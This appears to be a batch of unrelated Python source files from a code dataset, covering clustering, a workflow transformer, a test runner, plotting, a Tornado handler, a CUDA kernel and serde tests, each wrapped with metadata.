0\r\n# ------------------------------Verifica se ja existe o indice\r\n for a in grupos:\r\n for i in range(len(grupos[a][0])):\r\n if j == grupos[a][0][i]:\r\n countIndice += 1\r\n#---------------------------------Calcula a distancia entre todos os grupos\r\n if countIndice == 0:\r\n for i in range(k):\r\n a = \"grupo\"+str(i+1)\r\n x1 = grupos[a][1][0]\r\n y1 = grupos[a][1][1]\r\n distancias[i] = dist(x0, y0, x1, y1)\r\n \r\n#--------------------------------De acordo com as distancias adiciona no grupo correspondente\r\n for x in range(k):\r\n count = 0\r\n for y in range(k):\r\n if(distancias[x], 2014\n#\n\n\"\"\"\nFunctions to transform JointJS JSON content to domain workflows, catalogs,\nand libraries.\n\nSee:\n http://www.jointjs.com/\n\"\"\"\n\nimport json\n\nfrom simple.workflow.library.transformer.exceptions import TransformerError\nfrom simple.workflow.library import build_workflow, build_catalog\nfrom simple.workflow.library import build_library\n\n\ndef initialize(_, logger):\n \"\"\"\n Initialize the context for JointJS transformers.\n \"\"\"\n\n logger.info('Initializing JointJS JSON transformers.')\n return {}\n\n\ndef to_workflow(logger, _, content):\n \"\"\"\n Transform native JointJS JSON content into a domain Workflow instance.\n \"\"\"\n\n logger.debug('Transforming JointJS JSON into workflow.')\n\n try:\n content = json.loads(content)\n except Exception as error:\n logger.error('Transformer encountered an error during JSON loading.',\n exc_info=error)\n raise TransformerError(error.args) from error\n\n metadata = content.get('metadata', {})\n elements = content.get('cells', [])\n\n # Iterate over the elements, stripping off the 'simple.' prefix used\n # by the JointJS stencil set.\n\n for element in elements:\n value = element['type']\n value = value.lstrip('simple.')\n element['type'] = value\n\n try:\n return build_workflow(metadata, elements, logger)\n except AttributeError as error:\n raise TransformerError(error.args) from error\n\n\ndef to_catalog(logger, _, content, workflows):\n \"\"\"\n Transform native JointJS JSON content into a domain Catalog instance.\n \"\"\"\n\n logger.debug('Transforming JointJS JSON into catalog.')\n\n try:\n content = json.loads(content)\n except Exception as error:\n logger.error('Transformer encountered an error during JSON loading.',\n exc_info=error)\n raise TransformerError(error.args) from error\n\n try:\n return build_catalog(content, workflows, logger)\n except AttributeError as error:\n raise TransformerError(error.args) from error\n\n\ndef to_library(logger, _, content, catalogs):\n \"\"\"\n Transform native JointJS JSON content into a domain Library instance.\n \"\"\"\n\n logger.debug('Transforming JointJS JSON into library.')\n\n try:\n content = json.loads(content)\n except Exception as error:\n logger.error('Transformer encountered an error during JSON loading.',\n exc_info=error)\n raise TransformerError(error.args) from error\n\n try:\n return build_library(content, catalogs, logger)\n except AttributeError as error:\n raise TransformerError(error.args) from error\n", "sub_path": "simple/workflow/library/transformer/jointjs.py", "file_name": "jointjs.py", "file_ext": "py", "file_size_in_byte": 2874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "json.loads", "line_number": 42, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 46, "usage_type": "call"}, {"api_name": "simple.workflow.library.build_workflow", "line_number": 60, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 62, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 77, "usage_type": "call"}, {"api_name": "simple.workflow.library.build_catalog", "line_number": 80, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 82, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 93, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 97, "usage_type": "call"}, {"api_name": "simple.workflow.library.build_library", "line_number": 100, "usage_type": "call"}, {"api_name": "simple.workflow.library.transformer.exceptions.TransformerError", "line_number": 102, "usage_type": "call"}]} +{"seq_id": "479455201", "text": "import os\nimport subprocess\nfrom termcolor import colored\n\ndef test_original(test):\n if test.find(' ') != -1:\n test = test.split()\n return ((subprocess.run([\"./our_micro_paint\", \"micro_paint_tester/examples/\" + test[1], \"micro_paint_tester/examples/\" + test[1]], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n command = \"micro_paint_tester/examples/\" + test\n return ((subprocess.run([\"./our_micro_paint\", command], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n\n\ndef test_my(test):\n if test.find(' ') != -1:\n test = test.split()\n return ((subprocess.run([\"./my_micro_paint\", \"micro_paint_tester/examples/\" + test[1], \"micro_paint_tester/examples/\" + test[1]], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n command = \"micro_paint_tester/examples/\" + test\n return ((subprocess.run([\"./my_micro_paint\", command], stdout=subprocess.PIPE)).stdout).decode(\"utf-8\")\n\n\nif __name__ == \"__main__\":\n print(colored(\"TEST ARGUMENTS\".ljust(65) + \"RESULT\", \"yellow\"))\n try:\n os.remove(\"correct_log.txt\")\n os.remove(\"errors_log.txt\")\n except:\n pass\n with open(\"tests.txt\", \"r\") as fd_tests, open(\"errors_log.txt\", \"a+\") as fd_error_log, open(\"correct_log.txt\", \"a+\") as fd_correct_log:\n tests = fd_tests.readlines()\n for test in tests:\n if test[0] != '#':\n output = test_original(test[0:-1]);\n my_output = test_my(test[0:-1]);\n if output == my_output:\n print(test[0:-1].ljust(65), end=\"\")\n print(colored(\"CORRECT\", \"green\"))\n fd_correct_log.write(\"\\n****************************************\\n%s\\n****************************************\\n\" % (test))\n fd_correct_log.write(\"==========output==========\\nYOU:\\n%s\\nOUR:\\n%s\" % (my_output, output))\n else:\n print(test[0:-1].ljust(65), end=\"\")\n print(colored(\"WRONG\", \"red\"))\n fd_error_log.write(\"\\n****************************************\\n%s\\n****************************************\\n\" % (test))\n fd_error_log.write(\"==========output==========\\nYOU:\\n%s\\nOUR:\\n%s\\n\" % (my_output, output))\n", "sub_path": "micro_paint/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2247, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "subprocess.run", "line_number": 8, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 8, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 10, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 16, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "subprocess.run", "line_number": 18, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 18, "usage_type": "attribute"}, {"api_name": "termcolor.colored", "line_number": 22, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 24, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 25, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 36, "usage_type": "call"}, {"api_name": "termcolor.colored", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "96399175", "text": "#!/usr/bin/env python3\n\"\"\"Implementation of K means and K means ++ algorithm\"\"\"\nimport sys\n\nimport random\nfrom copy import deepcopy\nimport numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import silhouette_score\n#import matplotlib.pyplot as plt\n\ndef preprocessing_churn_data(data):\n \"\"\"Pre processing data\"\"\"\n #print(data.info())\n #print(data.head())\n dataframe_churn = pd.DataFrame(data)\n \"\"\"Pre processing data\n dataframe_churn = pd.DataFrame(data=dataframe_churn, \\\n columns=['customerID', 'gender', 'SeniorCitizen', 'Partner', 'Dependents', \\\n 'tenure', 'PhoneService', 'MultipleLines', 'InternetService', 'OnlineSecurity', \\\n 'OnlineBackup', 'DeviceProtection', 'TechSupport', 'StreamingTV', 'StreamingMovies', \\\n 'PaperlessBilling', 'PaymentMethod', 'MonthlyCharges', 'TotalCharges'])\"\"\"\n dataframe_churn.drop(dataframe_churn.columns[[0]], axis=1, inplace=True)\n categorical_cols = {1, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17}\n for num in categorical_cols:\n dataframe_churn[num] = preprocessing.LabelEncoder().fit_transform(dataframe_churn[num])\n #dataframe_churn[num] = dataframe_churn[num].astype('category')\n #dataframe_churn[num] = dataframe_churn[num].cat.codes\n dataframe_churn[19] = pd.to_numeric(dataframe_churn[19], errors=\"coerce\")\n dataframe_churn.dropna(how='any', inplace=True)\n return dataframe_churn\n\ndef normalize_data(data):\n \"\"\"Nomralize data to value between 0 and 1\"\"\"\n minmax_processed = preprocessing.MinMaxScaler().fit_transform(data)\n normalized_df = pd.DataFrame(minmax_processed)\n return normalized_df\n\ndef euclidian_dist(point1, point2, axis=1):\n \"\"\"Euclidian distance between 2 points in Euclidian space\"\"\"\n return np.linalg.norm(point1 - point2, axis=axis)\n\ndef initial_centroids(data, k):\n \"\"\"Random initial centroids for k means\"\"\"\n centroids = random.sample(list(data), k)\n return centroids\n\ndef has_converged(centroids, centroids_old):\n \"\"\"Check if k means has converged\"\"\"\n return False\n #return set([tuple(a) for a in centroids]) == set([tuple(a) for a in centroids_old])\n\ndef distance_from_centers(X, centroids):\n \"\"\"D2 Squared distance for points from centers\"\"\"\n dist_squared = np.array([min([np.linalg.norm(x-center)**2 for center in centroids]) for x in X])\n return dist_squared\n\ndef next_center(X, dist_squared):\n \"\"\"Select next center based on highest probability\"\"\"\n prob = dist_squared/dist_squared.sum()\n cumprob = prob.cumsum()\n r = random.random()\n index = np.where(cumprob >= r)[0][0]\n return X[index]\n\ndef kpp_centers(X, k):\n \"\"\"Initial Centers for k plus plus clustering\"\"\"\n centroids = random.sample(list(X), 1)\n for i in range(1, k):\n dist = distance_from_centers(X, centroids)\n centroids.append(next_center(X, dist))\n return centroids\n\ndef k_means(data, k, init=\"random\"):\n \"\"\"function implementing k-means algorithm\"\"\"\n #inputs dataframe, number of clusters and type of kmeans\n normalized_df = normalize_data(data)\n x = normalized_df.values\n X = np.array(list(zip(x)))\n clusters = np.zeros(len(X))\n #Initial cluster centers\n if init == \"random\":\n centroids = initial_centroids(X, k)\n else:\n centroids = kpp_centers(X, k)\n #k Means algorithm. Iterate until convergence\n max_iterations = 500\n while max_iterations >= 0:\n for i in range(len(X)):\n distances = [euclidian_dist(X[i], center) for center in centroids]\n cluster = np.argmin(distances)\n clusters[i] = cluster\n\n centroids_old = deepcopy(centroids)\n #new centroids are mean of all data points in new cluster\n for i in range(k):\n points = [X[j] for j in range(len(X)) if clusters[j] == i]\n centroids[i] = np.mean(points, axis=0)\n #centroids = new_centers(k, X, clusters)\n if has_converged(centroids, centroids_old):\n print(\"breaking...... Convergence\")\n #break\n max_iterations = max_iterations - 1\n return clusters\n\n\ndef pca_analysis(data):\n \"\"\"Performing principal component analysis for our data\"\"\"\n pca_data = normalize_data(data)\n sklearn_pca = PCA(n_components=2)\n principal_components = sklearn_pca.fit_transform(pca_data)\n principal_df = pd.DataFrame(data=principal_components, \\\n columns=['Principal Component 1', 'Principal Component 2'])\n #plt.figure(figsize=(10, 8))\n #plt.scatter(principalDF[:, 0], principalDF[:, 1], c=y)\n pca_kmeans = k_means(principalDF, 2)\n pca_kpp = k_means(principalDF, 2, \"kpp\")\n\ndef optimal_k(data, n_clusters, type_kmeans):\n \"\"\"Find optimal number of k clusters using Silhoutte score analysis\"\"\"\n normalized_df = normalize_data(data)\n matrix = normalized_df.as_matrix()\n k_scores = []\n for n_clusters in range(2, 30):\n clusters = k_means(data, n_clusters, type_kmeans)\n silhouette_avg = silhouette_score(matrix, clusters)\n k_scores.append(silhouette_avg)\n print(\"For n_clusters =\", n_clusters, \"The average silhouette_score is :\", silhouette_avg)\n\n #Plot the average Silhoutte score for each num\n #plt.figure(figsize=(12, 8))\n #plt.plot(range(2, 30), k_scores)\n #plt.xlabel('No of Clusters')\n #plt.ylabel('Silhouette_avg')\n #plt.title('Silhoutte Score for different clusters')\n\n return k_scores\n\ndef main():\n \"\"\"main function\"\"\"\n try:\n data = pd.read_csv(sys.argv[1], header=None)\n k = int(sys.argv[2])\n type_kmeans = sys.argv[3]\n except IndexError:\n print(\"Expected 3 inputs : filepath , number of clusters and type of kmeans. \\\n \\nProgram exiting....\")\n sys.exit(1)\n\n #K - means clustering\n if len(data.columns) >= 15:\n #cluster.csv dataset\n procesed_churn_data = preprocessing_churn_data(data)\n procesed_churn_data_df = pd.DataFrame(procesed_churn_data)\n clusters = k_means(procesed_churn_data_df, 2, type_kmeans)\n optimal_k(procesed_churn_data_df, 2, type_kmeans)\n else:\n #wine.csv dataset\n clusters = k_means(data, k, type_kmeans)\n optimal_k(data, k, type_kmeans)\n\n #k_scores = optimal_k(data)\n \"\"\"\n #Perform PCA\n #pca_analysis(data)\n \"\"\"\n output = pd.DataFrame(clusters)\n output.to_csv('output.csv', sep=',', index=False, header=None)\n\nif __name__ == '__main__':\n main()\n", "sub_path": "source.py", "file_name": "source.py", "file_ext": "py", "file_size_in_byte": 6509, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 28, "usage_type": "name"}, {"api_name": "pandas.to_numeric", "line_number": 31, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 37, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 37, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 43, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 57, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 65, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 93, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 100, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 112, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.silhouette_score", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 144, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 144, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 145, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 146, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 150, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 156, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 169, "usage_type": "call"}]} +{"seq_id": "148751546", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n#\ndataset=pd.read_csv('311_Service_Requests_from_2010_to_Present.csv')\ndata=dataset[['Complaint Type','City']]\n#data=data.iloc[0:100,:]\nFinalData=[]\nucity=data['City'].unique()\nucomplaintdata=data['Complaint Type'].unique()\n\nfor ctype in ucomplaintdata:\n Complaint=[]\n City=[]\n Count=[]\n Complaint.append(ctype)\n for city in ucity:\n City.append(city)\n Count.append(data['Complaint Type'][data['Complaint Type'] == ctype][data['City'] == city].count())\n Complaint.append(City)\n Complaint.append(Count)\n FinalData.append(Complaint)\nComplaint=[]\nCity=[]\nCount=[]\nCity=FinalData[0][1]\nfor i in range(0,len(FinalData)):\n Complaint.append(FinalData[i][0])\n Count.append(FinalData[i][2])\n \nXIndex=np.arange(len(City))\nk=len(City)*[0]\nfor i in range(0,len(Count)):\n \n if(i==0):\n plt.bar(XIndex,Count[i],edgecolor='Black')\n else:\n plt.bar(XIndex,Count[i],bottom=k,edgecolor='Black')\n k=np.add(k,Count[i])\n for j in XIndex:\n if((Count[i][j])!=0):\n plt.text(j,k[j]-((Count[i][j])/2),(Count[i][j]),size=3)\n \nplt.xlabel('City') \nplt.ylabel('Complaint count')\n#plt.ylim(0,max(k)) \nplt.xticks(XIndex,City,fontsize=5,rotation=90)\nplt.legend(Complaint,fontsize=5,loc='upper right')\nplt.title('City vs Complaint Count')\nplt.grid()\n#plt.figure(figsize=(2,1))\nplt.savefig('final1.png')\n\n \n", "sub_path": "Service_Requests/ServiceRequests.py", "file_name": "ServiceRequests.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 5, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "numpy.add", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "551075045", "text": "#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nimport tornado.web\nimport json\nfrom utils import utils\nfrom utils import KEY\nfrom database import db\nfrom tornado.escape import json_encode\n\nclass GetRecipientInfoHandler(tornado.web.RequestHandler):\n def post(self):\n params = {}\n resp = {KEY.STATUS: 500}\n params = utils.decode_params(self.request)\n if KEY.EVENT_ID not in params:\n self.write(json_encode(resp))\n return\n\n '''trans the term's type'''\n params[KEY.EVENT_ID] = int(params[KEY.EVENT_ID])\n launcher_info = db.get_event_information(params)\n if launcher_info is not None:\n user_info = db.get_user_information({KEY.ID: launcher_info[KEY.LAUNCHER_ID]})\n if user_info is not None:\n resp[KEY.STATUS] = 200\n resp[KEY.ID] = user_info[KEY.ID]\n resp[KEY.NICKNAME] = user_info[KEY.NICKNAME]\n resp[KEY.NAME] = user_info[KEY.NAME]\n resp[KEY.AGE] = user_info[KEY.AGE]\n resp[KEY.GENDER] = user_info[KEY.GENDER]\n resp[KEY.PHONE] = user_info[KEY.PHONE]\n resp[KEY.OCCUPATION] = user_info[KEY.OCCUPATION]\n resp[KEY.REPUTATION] = user_info[KEY.REPUTATION]\n resp[KEY.LOCATION] = user_info[KEY.LOCATION]\n resp[KEY.IS_VERIFY] = user_info[KEY.IS_VERIFY]\n\n self.write(json_encode(resp))\n", "sub_path": "android/project/handlerforandroid/get_recipient_info.py", "file_name": "get_recipient_info.py", "file_ext": "py", "file_size_in_byte": 1444, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tornado.web.web", "line_number": 10, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 10, "usage_type": "name"}, {"api_name": "utils.KEY.STATUS", "line_number": 13, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.utils.decode_params", "line_number": 14, "usage_type": "call"}, {"api_name": "utils.utils", "line_number": 14, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 15, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 15, "usage_type": "name"}, {"api_name": "tornado.escape.json_encode", "line_number": 16, "usage_type": "call"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 20, "usage_type": "name"}, {"api_name": "database.db.get_event_information", "line_number": 21, "usage_type": "call"}, {"api_name": "database.db", "line_number": 21, "usage_type": "name"}, {"api_name": "database.db.get_user_information", "line_number": 23, "usage_type": "call"}, {"api_name": "database.db", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.KEY.STATUS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 25, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 26, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 27, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 28, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 28, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 29, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 30, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 31, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 31, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 32, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 32, "usage_type": "name"}, {"api_name": "utils.KEY.REPUTATION", "line_number": 33, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 33, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.KEY.IS_VERIFY", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 35, "usage_type": "name"}, {"api_name": "tornado.escape.json_encode", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "393812132", "text": "import torch\n\nfrom ....utils.cuda import (cuda_num_threads, Stream, load_kernel, kernel_loop,\n get_blocks)\nfrom .int_as_float_gpu import int_as_float_gpu\n\nkernel = kernel_loop + \"\"\"\nextern \"C\"\n__global__ void scatter_max(\nconst float* input, const int* cluster, int* max) {\n\n CUDA_KERNEL_LOOP(idx, ${num_threads}) {\n\n const int n_idx = idx / ${M};\n const int m_idx = idx % ${M};\n int c = cluster[n_idx] * ${M} + m_idx;\n\n // Convert value `f` to ordered integer value to perform `atomicMax`.\n int f = __float_as_int(input[idx]);\n f = f >= 0 ? f : f ^ 0x7FFFFFFF;\n\n // Compute `scatter_max`.\n atomicMax((int*) &max[c], f);\n }\n}\n\"\"\"\n\n\ndef scatter_max_gpu(input, cluster, K):\n with torch.cuda.device_of(input):\n M = input.size(1)\n max = torch.cuda.IntTensor(K, M).fill_(-2147483648)\n num_threads = input.numel()\n f = load_kernel('scatter_max', kernel, num_threads=num_threads, M=M)\n f(args=[input.data_ptr(),\n cluster.data_ptr(),\n max.data_ptr()],\n block=(cuda_num_threads, 1, 1),\n grid=(get_blocks(num_threads), 1, 1),\n stream=Stream(ptr=torch.cuda.current_stream().cuda_stream))\n\n return int_as_float_gpu(max)\n", "sub_path": "torch_geometric/nn/functional/max_pool_voxel/scatter_max_gpu.py", "file_name": "scatter_max_gpu.py", "file_ext": "py", "file_size_in_byte": 1259, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "utils.cuda.kernel_loop", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.cuda.device_of", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.cuda.IntTensor", "line_number": 32, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 32, "usage_type": "attribute"}, {"api_name": "utils.cuda.load_kernel", "line_number": 34, "usage_type": "call"}, {"api_name": "utils.cuda.cuda_num_threads", "line_number": 38, "usage_type": "name"}, {"api_name": "utils.cuda.get_blocks", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.cuda.Stream", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda.current_stream", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "int_as_float_gpu.int_as_float_gpu", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "258716904", "text": "import datetime\nimport uuid\nfrom collections import OrderedDict\n\nfrom pytest import raises\n\nfrom serde import Model\nfrom serde.error import SerdeError, ValidationError\nfrom serde.field import (\n Bool, Choice, Date, DateTime, Dict, Domain, Email, Field, Float, Instance,\n Int, IpAddress, Ipv4Address, Ipv6Address, List, MacAddress, Nested, Slug,\n Str, Time, Tuple, Url, Uuid, _resolve_to_field_instance, create\n)\n\n\nclass Stringify(Field):\n\n def serialize(self, value):\n return str(value)\n\n def deserialize(self, value):\n return eval(value)\n\n\nclass TestField:\n\n def test___init__(self):\n field = Field()\n\n assert field.id >= 0\n assert field.rename is None\n assert field.required is True\n assert field.default is None\n assert field.validators == []\n\n # A second Field instantiated should have a higher counter.\n field2 = Field()\n assert field2.id > field.id\n\n # A Field with extra options set.\n field = Field(rename='test', required=False, default=5, validators=[None])\n assert field.rename == 'test'\n assert field.required is False\n assert field.default == 5\n assert field.validators == [None]\n\n def test__setattr__(self):\n field = Field()\n\n with raises(SerdeError):\n class Example(Model):\n a = field\n b = field\n\n def test_name(self):\n field = Field()\n\n with raises(SerdeError):\n field.name()\n\n def test_serialize(self):\n field = Field()\n\n # The base field simply passes things through.\n for value in (None, 0, 'string', object(), type):\n field.serialize(value) == value\n\n def test_deserialize(self):\n field = Field()\n\n # The base field simply passes things through.\n for value in (None, 0, 'string', object(), type):\n field.deserialize(value) == value\n\n def test_validate(self):\n field = Field()\n\n # Everything is okay on a base field.\n for value in (None, 0, 'string', object(), type):\n field.validate(value)\n\n\nclass TestInstance:\n\n def test___init__(self):\n example = Instance(int)\n\n assert example.type == int\n assert example.required is True\n assert example.validators == []\n\n example = Instance(int, required=False, validators=[None])\n assert example.type == int\n assert example.required is False\n assert example.validators == [None]\n\n def test_serialize(self):\n example = Instance(int)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes all values through.\n for value in (None, 0, 'string', object(), type):\n example.serialize(value) == value\n\n def test_deserialize(self):\n example = Instance(int)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes all values through.\n for value in (None, 0, 'string', object(), type):\n example.deserialize(value) == value\n\n def test_validate(self):\n example = Instance(int)\n\n # All integers should pass the validation.\n example.validate(-1000)\n example.validate(0)\n example.validate(1000)\n\n # Anything that is not an int should raise a ValidationError.\n for value in (None, 20.0, 'string', object, type):\n with raises(ValidationError):\n example.validate(value)\n\n\nclass TestDict:\n\n def test_serialize(self):\n # A field that is a key value pair of Strs and Stringifys.\n field = Dict(Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Dict like value through.\n for value in ({}, OrderedDict()):\n field.serialize(value) == value\n\n # Any value that is not an Dict will raise a AttributeError\n # because it doesn't have the `.items()` method.\n for value in (None, 20.0, object, type):\n with raises(AttributeError):\n field.serialize(value)\n\n # Serialize calls the key and value serialize methods.\n assert field.serialize({'a': False, 'b': ['s'], 'c': {'a': 5}}) == \\\n {'a': 'False', 'b': \"['s']\", 'c': \"{'a': 5}\"}\n\n def test_deserialize(self):\n # A field that is a key value pair of Strs and Stringifys.\n field = Dict(Str, Stringify)\n\n # Validation only happens when this Field is part of a Model. So it\n # still passes any Dict like value through.\n for value in ({}, OrderedDict()):\n field.deserialize(value) == value\n\n # Any value that is not an Dict will raise a AttributeError\n # because it doesn't have the `.items()` method.\n for value in (None, 20.0, object, type):\n with raises((AttributeError, TypeError)):\n field.deserialize(value)\n\n # Deserialize calls the subfield deserialize method.\n assert field.deserialize({'a': 'False', 'b': \"['s']\", 'c': \"{'a': 5}\"}) == \\\n {'a': False, 'b': ['s'], 'c': {'a': 5}}\n\n def test_validate(self):\n # A field that is a key value pair of Strs and Stringifys.\n field = Dict(Str, Stringify)\n\n # A list of Stringifyiable serializable types will pass validation.\n field.validate({'a': False, 'b': ['s'], 'c': {'a': 5}})\n\n # Any value that is not an Dict will raise a ValidationError\n for value in (None, 20.0, object, type):\n with raises(ValidationError):\n field.validate(value)\n\n # A dictionary 